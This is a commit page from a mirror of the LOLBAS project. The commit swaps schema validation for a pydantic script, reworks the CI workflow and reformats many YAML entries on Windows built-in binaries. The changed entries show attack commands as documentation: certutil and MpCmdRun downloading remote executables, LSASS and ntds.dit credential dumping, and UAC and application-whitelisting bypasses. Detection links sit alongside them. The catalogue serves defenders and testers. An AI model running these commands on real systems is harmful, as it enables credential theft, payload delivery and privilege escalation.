public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-10-14 01:15:35 +02:00
Code Issues Projects Releases Wiki Activity

Improve GitHub Actions workflows (#467)

Browse Source
This commit is contained in:
Wietze
2025-10-02 18:14:34 +01:00
committed by GitHub
parent 2d7441bb9a
commit dcca4db04a
16 changed files with 150 additions and 188 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.github/.yamllint vendored
View File

@@ -8,6 +8,7 @@ rules:
trailing-spaces:
level: error
line-length:
max: 1000
level: warning
new-lines:
level: error

120
.github/workflows/validation.py vendored Normal file
View File

@@ -0,0 +1,120 @@
import glob
import os
import sys
from typing import List, Literal, Optional
import yaml
from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict
# Disable datetime parsing
yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()}
safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$')
class LolbasModel(BaseModel):
model_config = ConfigDict(extra="forbid")
class AliasItem(LolbasModel):
Alias: Optional[str]
class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]):
pass
class CommandItem(LolbasModel):
Command: str
Description: safe_str
Usecase: safe_str
Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload']
Privileges: str
MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$')
OperatingSystem: str
Tags: Optional[List[TagItem]] = None
class FullPathItem(LolbasModel):
Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$')
class CodeSampleItem(LolbasModel):
Code: str
class DetectionItem(LolbasModel):
IOC: Optional[str] = None
Sigma: Optional[HttpUrl] = None
Analysis: Optional[HttpUrl] = None
Elastic: Optional[HttpUrl] = None
Splunk: Optional[HttpUrl] = None
BlockRule: Optional[HttpUrl] = None
@model_validator(mode="after")
def validate_exclusive_urls(cls, values):
url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule']
present = [field for field in url_fields if values.__dict__.get(field) is not None]
if len(present) != 1:
raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}")
return values
class ResourceItem(LolbasModel):
Link: HttpUrl
class AcknowledgementItem(LolbasModel):
Person: str
Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None
class MainModel(LolbasModel):
Name: str
Description: safe_str
Aliases: Optional[List[AliasItem]] = None
Author: str
Created: constr(pattern=r'\d{4}-\d{2}-\d{2}')
Commands: List[CommandItem]
Full_Path: List[FullPathItem]
Code_Sample: Optional[List[CodeSampleItem]] = None
Detection: Optional[List[DetectionItem]] = None
Resources: Optional[List[ResourceItem]] = None
Acknowledgement: Optional[List[AcknowledgementItem]] = None
if __name__ == "__main__":
def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A')
yaml_files = glob.glob("yml/**", recursive=True)
if not yaml_files:
print("No YAML files found under 'yml/**'.")
sys.exit(-1)
has_errors = False
for file_path in yaml_files:
if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'):
try:
with open(file_path, 'r', encoding='utf-8') as f:
data = yaml.safe_load(f)
MainModel(**data)
print(f"✅ Valid: {file_path}")
except ValidationError as ve:
print(f"❌ Validation error in {file_path}:\n{ve}\n")
for err in ve.errors():
# GitHub Actions error format
print(err)
path = '.'.join([str(x) for x in err.get('loc', [None])])
msg = err.get('msg', 'Unknown validation error')
print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}")
has_errors = True
except Exception as e:
print(f"⚠️ Error processing {file_path}: {e}\n")
print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}")
has_errors = True
sys.exit(-1 if has_errors else 0)

42
.github/workflows/yaml-linting.yml vendored
View File

@@ -8,6 +8,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Check file extensions
run: |
files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml");
@@ -17,6 +18,7 @@ jobs:
exit 1;
fi
unset files
- name: Check duplicate file names
run: |
files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/')
@@ -26,34 +28,12 @@ jobs:
exit 1;
fi
unset files
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint
- name: Validate Template Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: YML-Template.yml
schema: YML-Schema.yml
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
- name: Install python dependencies
run: pip install yamllint==1.37.1 pydantic==2.11.9
- name: Lint YAML files
run: yamllint -c .github/.yamllint yml/**/
- name: Validate YAML schemas
run: python3 .github/workflows/validation.py

129
YML-Schema.yml
View File

@@ -1,129 +0,0 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
format: '%Y-%M-%d'
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
pattern: '^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)\<\>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$'
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
required: true
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'

2
yml/OSBinaries/Bitsadmin.yml
View File

@@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml

4
yml/OSBinaries/Certutil.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not.
Usecase: Download file from Internet
Category: Download
Privileges: User
@@ -26,7 +26,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -URL {REMOTEURL:.exe}
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`.
Usecase: Download file from Internet
Category: Download
Privileges: User

3
yml/OSBinaries/Cmdkey.yml
View File

@@ -19,6 +19,3 @@ Detection:
Resources:
- Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:

2
yml/OSBinaries/Eudcedit.yml
View File

@@ -5,7 +5,7 @@ Author: Matan Bahar
Created: 2025-08-07
Commands:
- Command: eudcedit
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
Privileges: Administrator

4
yml/OSBinaries/Eventvwr.yml
View File

@@ -5,7 +5,7 @@ Author: Jacob Gajek
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
Privileges: User
@@ -15,7 +15,7 @@ Commands:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: UAC Bypass
Privileges: Administrator

8
yml/OSBinaries/Iscsicpl.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool
Author: Ekitji
Created: 2025-08-17
Commands:
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.
Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt.
Category: UAC Bypass
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: iscsicpl.exe # SysWOW64/System32 binary
- Command: iscsicpl.exe # SysWOW64/System32 binary
Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
@@ -24,8 +24,8 @@ Commands:
- Execute: CMD
- Application: GUI
Full_Path:
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
- IOC: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll

2
yml/OSBinaries/Ldifde.yml
View File

@@ -5,7 +5,7 @@ Author: Grzegorz Tworek
Created: 2022-08-31
Commands:
- Command: Ldifde -i -f {PATH:.ldf}
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.
Usecase: Download file from Internet
Category: Download
Privileges: Administrator

2
yml/OSBinaries/MpCmdRun.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
Usecase: Download file
Category: Download
Privileges: User

2
yml/OSBinaries/OneDriveStandaloneUpdater.yml
View File

@@ -5,7 +5,7 @@ Author: 'Elliot Killick'
Created: 2021-08-22
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
Category: Download
Privileges: User

6
yml/OSBinaries/Rdrleakdiag.yml
View File

@@ -5,21 +5,21 @@ Author: 'John Dwyer'
Created: 2022-05-18
Commands:
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump process by PID.
Category: Dump
Privileges: User
MitreID: T1003
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump LSASS process.
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump LSASS process mutliple times.
Category: Dump
Privileges: Administrator

9
yml/OtherMSBinaries/Dsdbutil.yml
View File

@@ -15,7 +15,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
- Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
Description: Mounting the snapshot with its GUID
Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
Category: Dump
Privileges: Administrator
MitreID: T1003.003
@@ -29,7 +29,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
- Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
Description: Mounting with snapshot identifier
Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
Category: Dump
Privileges: Administrator
MitreID: T1003.003
@@ -51,11 +51,6 @@ Detection:
- IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
- IOC: Event ID 4656
- IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
- Analysis:
- Sigma:
- Elastic:
- Splunk:
- BlockRule:
Resources:
- Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
- Link: https://www.netwrix.com/ntds_dit_security_active_directory.html

2
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@@ -5,7 +5,7 @@ Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User